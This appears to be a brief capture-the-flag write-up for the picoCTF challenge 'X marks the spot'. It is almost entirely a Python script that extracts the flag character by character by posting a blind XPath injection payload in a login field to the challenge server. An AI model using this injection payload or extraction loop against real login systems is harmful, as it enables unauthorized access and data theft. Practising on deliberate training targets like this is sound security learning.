X marks the spot - pico
March 15, 2022•96 words
import requests
import string
chars = string.ascii_lowercase + string.ascii_uppercase + string.digits + "}_"
flag = "picoCTF{"
while True:
for char in chars:
result = requests.post("http://mercury.picoctf.net:20297/", data = {"name": "' or //*[starts-with(text(), '"+flag+char+"')] or 'a'='b", "pass":"pass"})
if "right path" in result.text:
flag += char
print("Added char: " + flag)
break